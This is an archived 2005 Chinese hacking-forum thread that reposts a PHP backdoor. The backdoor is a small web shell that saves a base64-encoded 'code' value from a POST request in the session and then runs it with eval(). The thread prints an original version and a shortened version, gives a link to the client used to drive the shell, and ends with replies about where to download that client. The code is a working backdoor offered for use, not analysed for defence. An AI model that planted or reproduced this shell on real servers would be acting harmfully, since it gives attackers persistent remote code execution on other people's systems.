邪恶八进制信息安全团队技术讨论组's Archiver

EvilOctal 2005-3-14 21:25

[转载]一段CS的php后门

文章作者:浅蓝的辐射鱼
信息来源:[url]www.77yan.com[/url]

和海阳的CS马一样,运行后会在主机“内存”里生成一个php后门。
只是我的客户端多加了点选项使得对方可以进行多个选择来生成自己需要的后门。
其实这些后门也是由偶来抉择的,其实很简单,你只要把php后门开头的<?和结尾的?>去掉就可以了。
代码:
代码:

--------------------------------------------------------------------------------


<?PHP
session_start();
if(isset($_POST[&#39;code&#39;])){
$_SESSION[&#39;theCode&#39;] = trim($_POST[&#39;code&#39;]);
}
if(isset($_SESSION[&#39;theCode&#39;])){
eval(base64_decode($_SESSION[&#39;theCode&#39;]));
}
?>


--------------------------------------------------------------------------------


lanker看了之后说代码是可以简化的。
改了后的代码:
代码:

--------------------------------------------------------------------------------


<?php
session_start();
isset($_POST[&#39;code&#39;]) && $_SESSION[&#39;theCode&#39;]=trim($_POST[&#39;code&#39;]);
isset($_SESSION[&#39;theCode&#39;]) && eval(base64_decode($_SESSION[&#39;theCode&#39;]));
?>


--------------------------------------------------------------------------------


呵呵,是少了点的样子,不过觉得其实也差不多的说~~if语句变这个样子了。
我实在比较懒,就不改了不改了。

客户端 [url]http://www.77yan.com/clent.html[/url]

宿心劫 2005-3-16 16:03

郁闷
火狐自己还未公布出来
倒先从鱼的BLOG帖来了

客户端地址已经改变
我们会提供新的下载地址

saiy 2005-3-16 18:31

居然被楼主看到了,呼,不好意思,换空间,那个烂东西暂时放不上去了.
新空间素空气提供的,绑不了米,不好意思~~~~

页: [1]
© 1999-2008 EvilOctal Security Team